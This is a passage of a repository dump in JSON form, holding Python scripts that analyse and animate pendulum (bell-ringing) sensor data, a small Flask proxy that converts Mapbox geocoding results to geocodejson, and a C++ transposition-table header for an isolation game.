np.sin(theta[start:start+i])\n line.set_data(x, y)\n return line,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim = animation.FuncAnimation(fig, animate, init_func=init, frames=len(theta), interval=20, blit=True)\n#Save the animation\n#anim.save('2sidepushfix.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n#Plot the animation\nx = np.array([-2,2])\nplt.plot(x,p*x,'r',linewidth=1,label=\"Fit\") #plot the fitted line, through the origin\nplt.xlabel(r'sin($\\theta$)')\nplt.ylabel(r'$\\\"{\\theta}$(rad/$s^2$)')\nplt.title(r'$\\\"{\\theta}$ vs sin($\\theta$)')\nplt.show()\n\"\"\"\n#PENDULUM AND FORCE ANIMATION\nfig_pend = plt.figure()\nax_pend = plt.axes(xlim=(-1.5, 1.5), ylim=(-1.5,1.5))\nbell, = ax_pend.plot([], [], 'bo', lw=5,label='Bell')\ntorque, = ax_pend.plot([], [], 'ro', lw=5, label='Force')\ndef init_pend():\n bell.set_data([], [])\n torque.set_data([], [])\n return bell, torque,\n#Animation function. This is called sequentially\ndef animate_pend(i):\n y = -np.cos(theta_corrected2[i+start]) #Bell's y position\n x = np.sin(theta_corrected2[i+start]) #Bell's x position\n bell.set_data(x, y)\n x_torque = force_curve[i] #Torque/J at time i\n torque.set_data(x_torque/3,0)\n return bell, torque,\n#Call the animator. blit=True means only re-draw the parts that have changed.\nanim_pend = animation.FuncAnimation(fig_pend, animate_pend, init_func=init_pend, frames=len(theta[start:]), interval=20, blit=True)\n#anim_pend.save('2sidepush_force.gif', fps=50, extra_args=['-vcodec', 'libx264'])\nplt.title('Bell swinging and force applied')\nplt.legend()\nplt.show()\n\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n"
},
{
"alpha_fraction": 0.6580516695976257,
"alphanum_fraction": 0.6858847141265869,
"avg_line_length": 30.4375,
"blob_id": "fe2369c896ea503031c03d9290d75e6a697f1768",
"content_id": "4c234ba9f5cc9ba39f916ad54d0b784f14b14055",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1509,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 48,
"path": "/despiker.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "from numpy import genfromtxt\nimport numpy as np\nimport csv\nimport matplotlib.pyplot as plt\n\n\ndef despiker(data):\n #gather the data and put the columns into seperate variables\n ringing_data = genfromtxt(data, delimiter=',')\n times = ringing_data[:,0]\n masses = ringing_data[:,1]\n\n\n #shift the data down by 1 reading\n first_value = masses[0]\n shifted = masses[0:-1]\n shifted = np.insert(shifted,0,first_value)\n\n #find difference of data and shifted data to identify outliers\n spikes = abs(masses-shifted)\n # index the spikes\n indices = np.array(np.where(spikes>10))\n indices = indices.transpose()\n # at each spike, replace the error by an interpolation. i+3 since some spikes are over 2 readings\n for i in indices:\n masses[i] = (masses[i-1] + masses[i+3])/2\n #concatenate the timestamps with the new smoothed mass data\n despiked = np.column_stack((times,masses))\n\n return despiked\n\nfile = '/Users/shuowanghe/github/IIB-Project/rawdata 7:12:19/arms.csv'\na = despiker(file)\nr = genfromtxt(file, delimiter=',')\nnp.savetxt(\"/Users/shuowanghe/github/IIB-Project/processed 7:12:19/smooth_arms.csv\", a, delimiter=\",\")\nflipped = a\nflipped[:,1] = 77*np.ones(len(a))-a[:,1]\na = despiker(file)\nnp.savetxt(\"/Users/shuowanghe/github/IIB-Project/processed 7:12:19/flipped_arms.csv\", flipped, delimiter=\",\")\nfig = plt.figure()\nax = fig.add_subplot(111)\n\nplt.plot(a[:,0],r[:,1])\nplt.show()\nplt.plot(a[:,0],a[:,1])\nplt.show()\nplt.plot(a[:,0],flipped[:,1])\nplt.show()\n"
},
{
"alpha_fraction": 0.6152758002281189,
"alphanum_fraction": 0.6534653306007385,
"avg_line_length": 26.19230842590332,
"blob_id": "0e5907ea610a8c4df73cb20ebb7793f64cd0bfac",
"content_id": "d38abbad81edc0e6a9ddca28be7d37c36e6c56be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 707,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 26,
"path": "/tester2.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport numpy as np\nfrom numpy import genfromtxt\n\ndata = genfromtxt('/Users/shuowanghe/github/IIB-Project/processed 22:11:19 Benet/flipped_ringingvid1.csv', delimiter=',')\n\nx = data[:,0]\ny = data[:,1]\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nline, = ax.plot([],[],lw=2)\nax.set_ylim(-2, np.max(y))\nax.set_xlim(0, np.max(30))\ndef animate(i):\n\n ax.set_xlim(x[i]-5, x[i]+1)\n line.set_xdata(x[:i])\n line.set_ydata(y[:i])\n\n return line,\n\nani = animation.FuncAnimation(fig, animate, frames=len(x),\n interval=3.6, blit=False)\nani.save('ringingvid1.gif', fps=50, extra_args=['-vcodec', 'libx264'])\n"
},
{
"alpha_fraction": 0.6365965604782104,
"alphanum_fraction": 0.6532497406005859,
"avg_line_length": 58.327999114990234,
"blob_id": "240cff20d7dc907a5b1d2e18824196163bbf5cd3",
"content_id": "1e4e0f4508cd967dfe1e618f4ab1618313c87973",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 14832,
"license_type": "no_license",
"max_line_length": 149,
"num_lines": 250,
"path": "/uncertainties.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "###-------------------------------------------------------------------------###\n###---------------------------------IMPORTS---------------------------------###\n###-------------------------------------------------------------------------###\nimport numpy as np\nimport matplotlib\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nimport scipy\nfrom scipy import integrate\nfrom scipy.optimize import least_squares\nfrom scipy.signal import find_peaks\nfrom scipy.signal import savgol_filter\nfrom scipy.integrate import cumtrapz\n###-------------------------------------------------------------------------###\n###------------------------UNPACK DATA AND GET ZEROS------------------------###\n###-------------------------------------------------------------------------###\n#Gather and unpack data from CSV\nuserinput_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/userinput.csv'\nuserinput = genfromtxt(userinput_file,delimiter=',')\nfreeswing_file = '/Users/shuowanghe/github/IIB-Project2/data/adafruitmay5th/freeswing.csv'\nfreeswing = genfromtxt(freeswing_file,delimiter=',')\ntimestamps,a_r,a_theta,theta_dot = userinput[:,0], userinput[:,1], userinput[:,2], userinput[:,3]\n#Differentiate gyro signal to get angular acceleration, then smooth with Sav-Gol filter\ntheta_double_dot = np.gradient(theta_dot,timestamps)\nfree_theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\nfiltered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\nfree_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n#Smooth the radial acceleration signal to find theta=zeros\nfiltered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\ntheta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\nstart = theta_zeros[0]\nfree_start_zeros,_ = find_peaks(savgol_filter(freeswing[:,1],window_length=21, polyorder=2),prominence=5)\nfree_start = free_start_zeros[0]\n###-------------------------------------------------------------------------###\n###--------------------------------FUNCTIONS--------------------------------###\n###-------------------------------------------------------------------------###\n#Function for getting angle from gyro by re-integrating at every theta=0 and distributing the drift\ndef get_theta(data):\n #find theta=zeros\n timestamps = data[:,0]\n a_r = data[:,1]\n theta_dot = data[:,3]\n filtered_a_r = savgol_filter(a_r,window_length=21, polyorder=2)\n theta_zeros,_ = find_peaks(filtered_a_r,prominence=5)\n start = theta_zeros[0]\n #integrate theta and distribute drift before every zero\n theta_int_once = cumtrapz(theta_dot[start:],timestamps[start:],initial=0)\n theta_fix = np.zeros(len(timestamps)) #generate an array to hold the fixed theta\n theta_fix[start:] = theta_int_once #put the hard integrated theta between the first 2 zeros\n prev_zero = start #initiate the last theta=0 as the first one for the loop\n for _ in theta_zeros[1:]: #reintegrate and correct drift\n time_section = timestamps[prev_zero:_+1] #carve out the section between the 2 zeros\n theta_dot_section = theta_dot[prev_zero:_+1]\n theta_section = cumtrapz(theta_dot_section,time_section,initial=0) #make the integration\n drift = theta_section[-1] #find the drift at the end of the section\n drift_vec = np.linspace(start=0,stop=drift,num=_-prev_zero+1) #generate a vector increasing steadily from 0 to the drift over that time frame\n theta_fix[prev_zero:_] = theta_section[:-1]-drift_vec[:-1] #make the correction so the last theta=0\n prev_zero = _ #store the zero point for the next loop\n return theta_fix #returns the drift-fixed theta\n\n#Function for getting the gradient in the sin(theta) vs ang accel equation\ndef get_gradient(data):\n theta = get_theta(data) #get drift corrected theta from the data #find theta=zeros\n timestamps = data[:,0]\n theta_dot = data[:,3]\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(theta_dot,timestamps)\n x = np.sin(theta)[start:]\n y = savgol_filter(theta_double_dot,window_length=25, polyorder=3)[start:]\n p = np.polyfit(x,y,deg=1)[0] #fit a line through all of the data points\n return p\n\n#Function for finding where force is being applied\ndef forcefinder(force):\n smooth_force = savgol_filter(force,window_length=45,polyorder=3)\n low_smooth_force = savgol_filter(force,window_length=35,polyorder=3)\n peaks,_ = find_peaks(abs(low_smooth_force),prominence=1)\n peak_matrix = np.zeros((len(peaks),3))\n peak_matrix[:,1] = peaks\n peaks = np.append(peaks,len(smooth_force))\n prev_peak = 0\n count = 0\n for i in peaks:\n mini_peaks_before,_ = find_peaks(abs(low_smooth_force)[prev_peak:i],prominence=0)\n begin = mini_peaks_before[-1]+prev_peak\n prev_end = mini_peaks_before[0]+prev_peak\n if count != len(peaks)-1:\n peak_matrix[count,0] = begin\n if count != 0:\n peak_matrix[count-1,2] = prev_end\n prev_peak = i\n count+=1\n return peak_matrix\n\n###-------------------------------------------------------------------------###\n###-------------------------------OPTIMISATION------------------------------###\n###-------------------------------------------------------------------------###\n#Optimise correction parameters for freeswing\ndef force_func(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = get_theta(freeswing)*theta_correction_factor+theta_offset\n theta_double_dot = np.gradient(freeswing[:,3],freeswing[:,0])\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)*theta_correction_factor\n p = get_gradient(freeswing)*gradient_correction_factor\n force = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\n return sum(abs(force))\nres=least_squares(fun=force_func, x0=[1,1,0])\nprint(\"theta factor: \",res.x[0],\"\\ngradient factor: \",res.x[1],\"\\ntheta offset: \",res.x[2],\"\\ncost: \",res.fun)\ntheta_correction_factor,gradient_correction_factor,theta_offset = res.x[0],res.x[1],res.x[2]\n#get the -mlg/J gradient from fitting the userinput graph\np = get_gradient(userinput)\nfree_p = get_gradient(freeswing)\n#Use re-integrated, drift corrected theta from now on\ntheta = get_theta(userinput)\nfree_theta = get_theta(freeswing)\n#Calculate some force quantity T/J using just the userinput data\nforce = filtered_theta_double_dot[start:]-p*np.sin(theta[start:])\nsmooth_force = savgol_filter(force,window_length=25, polyorder=3)\n#Calculate some force quantity T/J using just the freeswing data\nfree_force = free_filtered_theta_double_dot[free_start:]-free_p*np.sin(free_theta[free_start:])\nfree_smooth_force = savgol_filter(free_force,window_length=25, polyorder=3)\n#Calculate it post corrections from freeswing data\np_corrected = p*gradient_correction_factor\ntheta_corrected = theta*theta_correction_factor+theta_offset\ntheta_dot_corrected = theta_dot*theta_correction_factor\nforce_corrected = theta_correction_factor*filtered_theta_double_dot[start:]-p_corrected*np.sin(theta_corrected[start:])\nsmooth_force_corrected = savgol_filter(force_corrected,window_length=25, polyorder=3)\n#get the indices where force is being applied and released\npeak_matrix = forcefinder(force_corrected).astype(int)\ntheta_dot_zeros,_ = find_peaks(abs(theta_dot[start:]),prominence=1)\n#get following data but when force isnt applied\nno_force_times = timestamps[start:]\nno_force_force = force\nno_force_theta = theta[start:]\nno_force_filtered_theta_double_dot = filtered_theta_double_dot[start:]\nfor i in range(len(peak_matrix)):\n force_range = range(peak_matrix[(len(peak_matrix)-1-i),0],peak_matrix[(len(peak_matrix)-1-i),2])\n no_force_times = np.delete(no_force_times,force_range)\n no_force_theta = np.delete(no_force_theta,force_range)\n no_force_force = np.delete(no_force_force,force_range)\n no_force_filtered_theta_double_dot = np.delete(no_force_filtered_theta_double_dot,force_range)\n#Optimise correction parameters again but only using no force data\ndef force_func2(corrections):\n theta_correction_factor,gradient_correction_factor,theta_offset = corrections[0],corrections[1],corrections[2]\n theta = no_force_theta*theta_correction_factor+theta_offset\n filtered_theta_double_dot = no_force_filtered_theta_double_dot*theta_correction_factor\n p = get_gradient(userinput)*gradient_correction_factor\n force = filtered_theta_double_dot-p*np.sin(theta)\n return sum(abs(force))\nres2=least_squares(fun=force_func2, x0=[1,1,0])\nprint(\"theta factor 2: \",res2.x[0],\"\\ngradient factor 2: \",res2.x[1],\"\\ntheta offset 2: \",res2.x[2],\"\\ncost 2: \",res2.fun)\ntheta_correction_factor2,gradient_correction_factor2,theta_offset2 = res2.x[0],res2.x[1],res2.x[2]\ntheta_corrected2 = theta*theta_correction_factor2+theta_offset2\np_corrected2 = p*gradient_correction_factor2\ntheta_dot_corrected2 = theta_dot*theta_correction_factor2\nforce_corrected2 = filtered_theta_double_dot[start:]*theta_correction_factor2-p_corrected2*np.sin(theta_corrected2[start:])\nsmooth_force_corrected2 = savgol_filter(force_corrected2,window_length=25, polyorder=3)\n###-------------------------------------------------------------------------###\n###-------------------------------UNCERTAINTY-------------------------------###\n###-------------------------------------------------------------------------###\ndef remove_mean(data):\n start = find_peaks(savgol_filter(data[:,1],window_length=21, polyorder=2),prominence=5)[0][0]\n theta_double_dot = np.gradient(data[:,3],data[:,0])[start:]\n filtered_theta_double_dot = savgol_filter(theta_double_dot,window_length=25, polyorder=3)\n p = get_gradient(data)\n theta = get_theta(data)[start:]\n vel = data[:,3][start:]\n force = filtered_theta_double_dot-p*np.sin(theta)\n no_bins = 50\n theta_means_variance = np.zeros([no_bins,2])\n vel_means_variance = np.zeros([no_bins,2])\n free_theta = get_theta(freeswing)[free_start:]\n free_vel = freeswing[:,3][free_start:]\n free_p = get_gradient(freeswing)\n free_theta_double_dot = np.gradient(free_vel,freeswing[:,0][free_start:])\n free_filtered_theta_double_dot = savgol_filter(free_theta_double_dot,window_length=25, polyorder=3)\n free_force = free_filtered_theta_double_dot-free_p*np.sin(free_theta)\n fixed_theta_force = filtered_theta_double_dot-p*np.sin(theta)\n fixed_vel_force = filtered_theta_double_dot-p*np.sin(theta)\n for bin in range(no_bins):\n theta_bin_start = (bin-no_bins/2)*2*np.pi/no_bins\n theta_bin_end = (bin-no_bins/2+1)*2*np.pi/no_bins\n free_theta_bin_indices = np.where((free_theta>=theta_bin_start)&(free_theta<theta_bin_end))\n data_theta_bin_indices = np.where((theta>=theta_bin_start)&(theta<theta_bin_end))\n if np.size(free_theta_bin_indices)>0:\n theta_means_variance[bin,0] = np.mean(free_force[free_theta_bin_indices])\n theta_means_variance[bin,1] = np.var(free_force[free_theta_bin_indices])\n fixed_theta_force[data_theta_bin_indices] = force[data_theta_bin_indices] - theta_means_variance[bin,0]\n\n vel_bin_start = (bin-no_bins/2)*(max(theta_dot)-min(theta_dot))/no_bins\n vel_bin_end = (bin-no_bins/2+1)*(max(theta_dot)-min(theta_dot))/no_bins\n free_vel_bin_indices = np.where((free_vel>=vel_bin_start)&(free_vel<vel_bin_end))\n data_vel_bin_indices = np.where((vel>=vel_bin_start)&(vel<vel_bin_end))\n if np.size(free_vel_bin_indices)>0:\n vel_means_variance[bin,0] = np.mean(free_force[free_vel_bin_indices])\n vel_means_variance[bin,1] = np.var(free_force[free_vel_bin_indices])\n fixed_vel_force[data_vel_bin_indices] = force[data_vel_bin_indices] - vel_means_variance[bin,0]\n\n return fixed_theta_force,theta_means_variance,vel_means_variance,fixed_vel_force,\n###-------------------------------------------------------------------------###\n###----------------------------------PLOTS----------------------------------###\n###-------------------------------------------------------------------------###\n#Plot mean and variance at each theta bin (theta corrected)\nplt.plot(free_theta[free_start:]*180/np.pi,free_force,'.',linewidth=0.5,label=r'Datapoints')\nplt.plot(np.linspace(-180,180,num=len(remove_mean(userinput)[1])),remove_mean(userinput)[1][:,0],label=r'Mean force')\nplt.xlabel(r'$\\theta$ bin (degrees)')\nplt.ylabel(r'Mean force $\\frac{T}{J}(s^{-2})$')\nplt.title(r'Mean force in each $\\theta$ bin')\nplt.legend()\nplt.show()\nplt.plot(np.linspace(-180,180,num=len(remove_mean(userinput)[1])),remove_mean(userinput)[1][:,1],label=r'Force variance')\nplt.xlabel(r'$\\theta$ bin (degrees)')\nplt.ylabel(r'$\\frac{T}{J}$ force variance')\nplt.title(r'Force variance in each $\\theta$ bin')\nplt.show()\n#Plot mean and variance at each theta bin (vel corrected)\nplt.plot(freeswing[:,3][free_start:],free_force,'.',linewidth=0.5,label=r'Datapoints')\nplt.plot(np.linspace(min(theta_dot),max(theta_dot),num=len(remove_mean(userinput)[2])),remove_mean(userinput)[2][:,0],label=r'Mean force')\nplt.xlabel(r'$\\dot{\\theta}$ bin (rad$s^{-1}$)')\nplt.ylabel(r'Mean force $\\frac{T}{J}(s^{-2})$')\nplt.title(r'Mean force in each $\\dot{\\theta}$ bin')\nplt.legend()\nplt.show()\nplt.plot(np.linspace(min(theta_dot),max(theta_dot),num=len(remove_mean(userinput)[2])),remove_mean(userinput)[2][:,1],label=r'Force variance')\nplt.xlabel(r'$\\dot{\\theta}$ bin (rad$s^{-1}$)')\nplt.ylabel(r'$\\frac{T}{J}$ force variance')\nplt.title(r'Force variance in each $\\dot{\\theta}$ bin')\nplt.show()\n#Plot force vs time for measured force, parameter corrected forces and mean corrected force (theta)\nplt.plot(timestamps[start:],force,label='no correction')\nplt.plot(no_force_times,no_force_force,'.',label='no applied force')\nplt.plot(timestamps[start:],force_corrected2,label='2nd correction')\nplt.plot(timestamps[start:],remove_mean(userinput)[0],label='Mean removed')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'Force vs time: As measured, parameter and mean corrected')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n#Plot force vs time for measured force, parameter corrected forces and mean corrected force (vel)\nplt.plot(timestamps[start:],force,label='no correction')\nplt.plot(no_force_times,no_force_force,'.',label='no applied force')\nplt.plot(timestamps[start:],force_corrected2,label='2nd correction')\nplt.plot(timestamps[start:],remove_mean(userinput)[3],label='Mean removed')\nplt.xlabel(r't(s)')\nplt.ylabel(r'$\\\"{\\theta}+\\frac{mgl}{J}sin(\\theta)$(rad/$s^2$)')\nplt.title(r'Force vs time: As measured, parameter and mean corrected')\nplt.axhline(0,color='b',linestyle='--')\nplt.legend()\nplt.show()\n"
},
{
"alpha_fraction": 0.616314172744751,
"alphanum_fraction": 0.6495468020439148,
"avg_line_length": 24.461538314819336,
"blob_id": "723824db173be3f88b6bd5407e0a797a47a3769b",
"content_id": "38b8f128e27bf089c4de537722b919a360fa9fac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 993,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 39,
"path": "/tester.py",
"repo_name": "ShuowangHe/IIB-Project2",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom matplotlib import pyplot as plt\nfrom numpy import genfromtxt\nfrom matplotlib.animation import FuncAnimation\nplt.style.use('seaborn-pastel')\nimport csv\n\n\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\nax = plt.axes(xlim=(0, 20), ylim=(-2, 90))\n#line, = ax.plot([], [], lw=1)\nx_len = 400\nxs = np.zeros([x_len,1])\nys = np.zeros([x_len,1])\n\n#def init():\n #line.set_data(xs, ys)\n #return line,\n #ax1.clear()\n #ax1.plot(xs, ys)\n\nringing_data = genfromtxt('/Users/shuowanghe/github/IIB-Project/processed 22:11:19 Benet/flipped_ringingvid1.csv', delimiter=',')\n\ndef animate(i,ringing_data,xs,ys):\n xs = np.append(xs,ringing_data[i,0])\n xs = xs[-x_len:]\n ys = np.append(ys,ringing_data[i,1])\n ys = ys[-x_len:]\n ax1.clear()\n ax1.plot(xs, ys)\n #line.set_data(xs, ys)\n print(xs[-1],ys[-1])\n #return line,\n\nanim = FuncAnimation(fig, animate, fargs = (ringing_data,xs,ys),interval=10)\n\nplt.show()\n#anim.save('test.gif', writer='PillowWriter')\n"
}
] | 16 |
geocoders/mapbox-geocodejson | https://github.com/geocoders/mapbox-geocodejson | 20d3cafca49820c8b5d97c91a5d41ad77c1d89cf | 9b23646f6393a9b39513a8050242f1883d4eefe6 | abe78f3c386a82555521dd7da66cc2bd82c61297 | refs/heads/master | 2023-03-23T09:47:03.793195 | 2017-11-09T15:38:20 | 2017-11-09T15:41:15 | 110,133,804 | 0 | 0 | null | 2017-11-09T15:40:14 | 2017-11-09T15:48:13 | 2021-03-19T21:38:15 | Python | [
{
"alpha_fraction": 0.6644737124443054,
"alphanum_fraction": 0.6776315569877625,
"avg_line_length": 29.399999618530273,
"blob_id": "1e0a75713bf77d3eff97069251d2d007d591b70a",
"content_id": "444b7d995c98834b0c6f225f49db08b1d44b3e9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 152,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 5,
"path": "/default_params/__init__.py",
"repo_name": "geocoders/mapbox-geocodejson",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nmapbox_API_key = \"pk.insert_token\"\nmapbox_base_url = \"https://api.mapbox.com/geocoding/v5/mapbox.places\"\n"
},
{
"alpha_fraction": 0.7063599228858948,
"alphanum_fraction": 0.7293639779090881,
"avg_line_length": 25.39285659790039,
"blob_id": "5cf8caf8cf6e3fbf341c5420c9f435fca6e1f956",
"content_id": "ba43c0c17f94d3f6ca3d4940822d9335aec38630",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 739,
"license_type": "no_license",
"max_line_length": 171,
"num_lines": 28,
"path": "/README.md",
"repo_name": "geocoders/mapbox-geocodejson",
"src_encoding": "UTF-8",
"text": "# Mapbox geocoding results in geocodejson format\n\nA very dumb proxy to run queries against mapbox geocoding API, and make Carmen geojson result compatible with [geocodejson](https://github.com/geocoders/geocodejson-spec).\n\n## Intalling\n\nPython3 is needed.\nTo install the requirements :\n\n pipenv install --three\n\nThen duplicate the default_params folder and rename to params :\n\n cp -R default_params/ params/\n\nPut your mapbox api key in the `params/__init__.py`\n\n## Running\n\n python api.py\n\nThen, you can geocode some stuff :\n\n curl 'http://localhost:5000/?q=rue%20de%20la%20procession'\n\nOr use [geocoder-tester](https://github.com/geocoders/geocoder-tester) :\n\n py.test --api-url http://localhost:5000/ --max-run 10\n"
},
{
"alpha_fraction": 0.583638608455658,
"alphanum_fraction": 0.587708592414856,
"avg_line_length": 38.629032135009766,
"blob_id": "0b1de6eda5e54f0403687e2100d1400c69f5d622",
"content_id": "cb3cf1b96f2b2dcae62461ee2810ad000db842a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2457,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 62,
"path": "/api.py",
"repo_name": "geocoders/mapbox-geocodejson",
"src_encoding": "UTF-8",
"text": "# encoding: utf-8\n\nfrom flask import Flask\nfrom flask_restful import Resource, Api, reqparse\nimport requests\nfrom params import mapbox_API_key as TOKEN\nfrom params import mapbox_base_url as BASE\n\napp = Flask(__name__)\napi = Api(app)\n\nmapbox_API_key = TOKEN\nmapbox_base_url = BASE\n\nclass CarmenAutocomplete(Resource):\n def get(self):\n parser = reqparse.RequestParser()\n parser.add_argument('q', type=str, help='the q you are you looking for', required=True)\n parser.add_argument('limit', type=int) #not available in the api ?\n args = parser.parse_args()\n query = args['q']\n\n autocomplete_url = \"{}/{}.json\".format(mapbox_base_url, query)\n get_results = requests.get(autocomplete_url, params = {'access_token' : mapbox_API_key})\n\n if not \"features\" in get_results.json() :\n return {\"type\": \"FeatureCollection\", \"features\":[], \"error\":\"no results\"}\n\n carmen_results = get_results.json()['features']\n geocodejson_results = []\n\n for a_feature in carmen_results :\n a_feature['properties']['type'] = a_feature['place_type'][0]\n a_feature['properties']['id'] = a_feature['id']\n a_feature['properties']['score'] = a_feature['relevance']\n a_feature['properties'][\"name\"] = a_feature['text']\n a_feature['properties'][\"label\"] = a_feature['place_name']\n if \"context\" in a_feature and len(a_feature[\"context\"]) > 2:\n a_feature['properties'][\"city\"] = a_feature['context'][1]['text']\n a_feature['properties'][\"postcode\"] = a_feature['context'][0]['text']\n a_feature['properties'][\"country\"] = a_feature['context'][2]['text']\n\n if \"address\" in a_feature:\n a_feature['properties'][\"housenumber\"] = a_feature['address']\n a_feature['properties'][\"street\"] = a_feature['text']\n a_feature['properties']['type'] = \"housenumber\"\n a_feature['properties'][\"name\"] = \"{} {}\".format(a_feature['properties'][\"housenumber\"], a_feature[\"text\"])\n\n geocodejson_results.append(a_feature)\n\n geocoder_json = {\n \"type\" : \"FeatureCollection\",\n \"query\" : get_results.json()['query'],\n \"features\" : geocodejson_results,\n }\n\n return geocoder_json\n\napi.add_resource(CarmenAutocomplete, '/')\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0')\n"
}
] | 3 |
koushikg14/ai | https://github.com/koushikg14/ai | 9f22bbcb1f7fe08081e83447b6afe3b0cbe02af3 | 111f2c525cab6991875dda90563cbea23e9b0600 | c666f1dd52c124112d93e51d17d669d2927737e0 | refs/heads/master | 2021-01-11T19:05:13.373747 | 2013-05-07T02:52:38 | 2013-05-07T02:52:38 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5964391827583313,
"alphanum_fraction": 0.6133955121040344,
"avg_line_length": 20.445453643798828,
"blob_id": "06886f50fc0ac91ebe50db13500cb4ed45ed2cc8",
"content_id": "e48f0c51dd49664d2f36606e797c876a05eca1ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2359,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 110,
"path": "/isolation/src/table.h",
"repo_name": "koushikg14/ai",
"src_encoding": "UTF-8",
"text": "#ifndef TABLE_H_\n#define TABLE_H_\n\n#include <set>\n#include <map>\n#include \"types.h\"\n#include \"game.h\"\n\nusing namespace std;\n\nstruct Entry\n{\n\tBoard board;\n\tPosition my;\n\tPosition her;\n\tint depth;\n int isolated; // 0 if unknown, 1 if isolated, -1 if not\n\tdouble score;\n\nEntry(Board b, Position m, Position h) : \n\tboard(b), my(m), her(h), isolated(0) {}\t\n\nEntry(Board b, Position m, Position h, int i) : \n\tboard(b), my(m), her(h), isolated(i) {}\t\n\nEntry(Board b, Position m, Position h, double s) : \n\tboard(b), my(m), her(h), isolated(0), score(s) {}\t\n};\n\nstruct EntryCompare {\n\tbool operator() (const Entry& lhs, const Entry& rhs) const {\n\t\tif (lhs.board != rhs.board)\n\t\t\treturn lhs.board < rhs.board;\n\t\telse if (lhs.my.row != rhs.my.row || lhs.my.col != rhs.my.col)\n\t\t\treturn lhs.my < rhs.my;\n\t\telse\n\t\t\treturn lhs.her < rhs.her;\n\t}\n};\n\n/*\n * Tranposition table\n */\nclass Table\n{\n private:\n\tset<Entry, EntryCompare> table_;\n\tint hits_;\n\t\n public:\n Table() : hits_(0) {}\n\t\t\n\t// check if current entry has exists\n\t// return 0, if unknown\n\t// return 1, if isolated\n\t// return -1 if not isolated\n\tint isolated(Board board, Position my, Position her) {\n\t\tset<Entry>::iterator it = table_.find(Entry(board,my,her,true));\n\t\t\n\t\t// if entry does not exists\n\t\t// or if isolation test is not done\n\t\tif (it == table_.end() || it->isolated == 0)\n\t\t\treturn 0;\n\n\t\thits_++;\n\t\tif (hits_ % 10000 == 0)\n\t\t\tcout << \"hits:\" << hits_ << endl;\n\n\t\tEntry e = *it;\n\t\tif (e.isolated)\n\t\t\treturn 1;\n\t\telse\n\t\t\treturn -1;\n\t}\n\n\tvoid insert(Board board, Position my, Position her, bool isolated) {\n\t\tint i = isolated ? 1 : -1;\n\t\ttable_.insert(Entry(board, my, her, i));\n\t\tif (table_.size() % 10000 == 0)\n\t\t\tcout << \"Table size:\" << table_.size() << endl;\n\n\t}\n\n\tdouble LookupScore(Board board, Position my, Position her) {\n\t\tset<Entry>::iterator it = table_.find(Entry(board,my,her));\n\t\t\n\t\t// if entry does not exists\n\t\t// or if the isolation test is done\n\t\tif (it == table_.end() || it->isolated)\n\t\t\treturn 0;\n\n\t\thits_++;\n\t\tif (hits_ % 10000 == 0)\n\t\t\tcout << \"hits:\" << hits_ << endl;\n\n\t\treturn it->score;\n\t}\n\n\n\tvoid InsertScore(Board board, Position my, Position her, double score) {\n\t\ttable_.insert(Entry(board, my, her, score));\n\t\tif (table_.size() % 10000 == 0)\n\t\t\tcout << \"Table size:\" << table_.size() << endl;\n\t}\n\n\n\tunsigned int size() { return table_.size();}\n};\n\n#endif // TABLE_H_\n"
},
{
"alpha_fraction": 0.6548942923545837,
"alphanum_fraction": 0.6616525053977966,
"avg_line_length": 22.580976486206055,
"blob_id": "38fb3f15ed5ad2a13d9fa61e179e947fe8f31690",
"content_id": "7f77aba8e1e9db1c391bd511ac30de1d3ec0e211",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 9174,
